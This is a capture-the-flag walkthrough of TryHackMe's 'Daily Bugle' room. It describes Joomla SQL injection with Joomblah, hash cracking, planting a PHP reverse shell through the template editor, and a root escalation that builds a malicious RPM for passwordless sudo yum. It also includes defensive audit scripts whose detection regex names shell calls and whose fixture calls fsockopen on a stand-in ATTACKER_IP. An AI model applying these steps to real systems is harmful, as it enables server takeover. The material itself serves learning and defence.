Daily Bugle {THM}

Intro

The box Daily Bugle is part of the Offensive Pentesting path on TryHackMe and is labeled as a hard box. The theme is that Jonah Jameson is at it again with another story hot off the press about Spiderman doing evil deeds. As we dive deeper into the machine, we will answer the questions that are asked of us and find the flags we are after by testing our skills in Joomla CMS SQLi, hash cracking, and abusing passwordless sudo rights on yum to fully compromise the box.




The Checklist




Nmap

The Nmap scan shows three open ports: SSH, a MySQL (MariaDB) server, and an Apache server running Joomla on CentOS. There is also a robots.txt file with 15 Disallow entries intended to keep those pages out of search engine results.




The Robbery

By accessing the box over port 80 in the browser we see the answer to our first question on the home page: who robbed the bank? Even though the answer is straightforward, it has to be entered in a particular format before it is accepted as correct.




Robots.txt

The robots.txt file is always a good place to look when doing recon on a website, as it lists additional pages that may not be easily found when brute-forcing directories. Do note, however, that not all websites have a robots.txt file. Going through these entries answers the second question.




Joomla CMS Access

After finding the version number and Googling for exploits, the tool Joomblah can be found on GitHub. Running Joomblah against the website yields a username and a password hash. Saving the hash to a file and running John the Ripper with the rockyou.txt wordlist cracks it, providing the login credentials needed to access the Joomla CMS through the directory found in robots.txt. This also answers the third question.




/administrator/

Login with the newly found credentials to gain access to the Joomla CMS dashboard.




Upon logging in, navigate to 'Templates' then 'Protostar'.




Click on New File at the top, enter the File Name 'shell', select the file type 'PHP', then click Create. Paste in a PHP reverse shell (editing the IP address and port number first) and click Save. Next, start a reverse listener and navigate to 'MACHINE_IP/templates/protostar/shell.php' to gain access to the system.
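From the defender's side, the step above leaves a PHP file in a template directory that no clean Joomla install ships. The following is an added example, not code from the writeup, that audits a template directory against a baseline of known-good files and flags PHP files containing calls a template never needs. The directory layout, the baseline file list and the file contents are all constructed for the demo; in practice the baseline comes from a clean install or the package manifest.

```python
import re
import tempfile
from pathlib import Path

# PHP calls that a legitimate Joomla template file has no reason to make but a
# web shell or reverse shell almost always does. Constructed, non-exhaustive list.
SUSPICIOUS_CALL = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|exec|system|eval)\s*\(", re.I
)


def audit_template_dir(template_dir, baseline):
    """Walk a template directory and return two sorted lists of relative paths:
    PHP files not in the known-good baseline, and PHP files containing calls
    from SUSPICIOUS_CALL (checked regardless of baseline membership)."""
    template_dir = Path(template_dir)
    unexpected, suspicious = [], []
    for path in sorted(template_dir.rglob("*.php")):
        rel = path.relative_to(template_dir).as_posix()
        if rel not in baseline:
            unexpected.append(rel)
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if SUSPICIOUS_CALL.search(text):
            suspicious.append(rel)
    return unexpected, suspicious


def demo():
    """Build a constructed Protostar-like directory in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "html").mkdir()
        (root / "index.php").write_text("<?php defined('_JEXEC') or die; echo 'template'; ?>")
        (root / "error.php").write_text("<?php defined('_JEXEC') or die; ?>")
        (root / "html" / "pagination.php").write_text("<?php defined('_JEXEC') or die; ?>")
        # stand-in for the file dropped via Templates -> Protostar -> New File
        (root / "shell.php").write_text("<?php $sock = fsockopen('ATTACKER_IP', 4444); ?>")
        # constructed subset of the files a clean template ships with
        baseline = {"index.php", "error.php", "component.php", "offline.php", "html/pagination.php"}
        return audit_template_dir(root, baseline)


if __name__ == "__main__":
    unexpected, suspicious = demo()
    print("not in baseline:", unexpected)
    print("suspicious calls:", suspicious)
```

Run it periodically against /templates and /administrator/templates, or hook it into a file-integrity monitor; a hash comparison against the baseline would additionally catch modified originals, which this name-only check does not.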




Who Am I? (PrivEsc)

Upon gaining the initial shell, we see that we are the 'apache' user with limited access. Running LinPEAS turns up a password that we can try for logging in as another user. Running the command 'cat /etc/passwd' shows that there is a user named 'jjameson'.




After switching to the user 'jjameson', we find the user.txt file in the directory '/home/jjameson/'.




I Am Root!

Running the command 'sudo -l' is a good habit to get into during the privilege escalation stage. Sometimes a password is not required to run it; generally, however, it requires the password of the user you are currently logged in as. After running the command we see that we can run yum to install packages as root without a password.




To get started, first create a bash file containing a reverse shell command that will connect back to your machine. Next, run the command 'fpm -n FILE-NAME -s dir -t rpm -a all --before-install PATH/TO/BASH/FILE PATH/TO/SAVE/FILE' to build an RPM whose pre-install script is that bash file. Afterwards, start up a Python web server and pull the '.rpm' file over to the target machine.




Finally, start your listener on your specified port to capture the reverse shell, then enter the following command on the target machine: 'sudo /usr/bin/yum --disablerepo=* install -y FILE-NAME.rpm'. You should notice that the yum process hangs, and that you now have a reverse shell as the user 'root'. By navigating to the '/root/' directory you will locate the root.txt file, and you have now completed the room!
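The root cause here is a sudoers rule, not a bug in yum: any package manager that runs package scriptlets as root is equivalent to NOPASSWD: ALL. The following is an added example, not part of the writeup, that parses user-specification lines from a sudoers file and reports NOPASSWD rules granting root code execution. The sample sudoers text is constructed (the jjameson line mirrors the rule described above, the rest is made up for contrast), and the list of flagged programs is a hand-picked, non-exhaustive assumption; aliases are not expanded.

```python
import os
import re
from dataclasses import dataclass

# Constructed sample in sudoers syntax.
SAMPLE_SUDOERS = """\
## Sudoers allows particular users to run various commands as root
Defaults    requiretty
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
carol   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
dave    ALL=(ALL) NOPASSWD: ALL
"""

# Programs that run package scriptlets or otherwise execute arbitrary code when
# invoked as root. Constructed, non-exhaustive list (assumption).
CODE_EXEC_PROGRAMS = {"yum", "dnf", "rpm", "apt", "apt-get", "dpkg", "pip", "pip3", "zypper"}

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(r"^(\S+)\s+(\S+?)=(?:\(([^)]*)\))?\s*((?:[A-Z_]+:\s*)*)(.*)$")


@dataclass
class SudoRule:
    user: str
    host: str
    runas: str
    tags: list
    commands: list


def parse_sudoers(text):
    """Parse user-specification lines of a sudoers file. Comments, Defaults and
    alias definitions are skipped; aliases are not expanded."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, tags, cmds = m.groups()
        rules.append(SudoRule(
            user=user,
            host=host,
            runas=runas if runas is not None else "root",  # sudo's default runas user
            tags=tags.replace(":", " ").split(),
            commands=[c.strip() for c in cmds.split(",") if c.strip()],
        ))
    return rules


def audit_sudoers(text):
    """Return (user, command) pairs for NOPASSWD rules that hand out root code
    execution: either ALL or a program from CODE_EXEC_PROGRAMS."""
    findings = []
    for rule in parse_sudoers(text):
        if "NOPASSWD" not in rule.tags:
            continue
        for cmd in rule.commands:
            if cmd == "ALL":
                findings.append((rule.user, cmd))
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in CODE_EXEC_PROGRAMS:
                findings.append((rule.user, cmd))
    return findings


if __name__ == "__main__":
    for user, cmd in audit_sudoers(SAMPLE_SUDOERS):
        print(f"NOPASSWD root code execution: {user} -> {cmd}")
```

Feed it the contents of /etc/sudoers and each file under /etc/sudoers.d (or the output of 'sudo -l' reformatted). The fix for a flagged rule is to drop NOPASSWD or replace the package manager with a narrowly scoped wrapper script, since argument restrictions on yum still allow installing an attacker-supplied local RPM.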
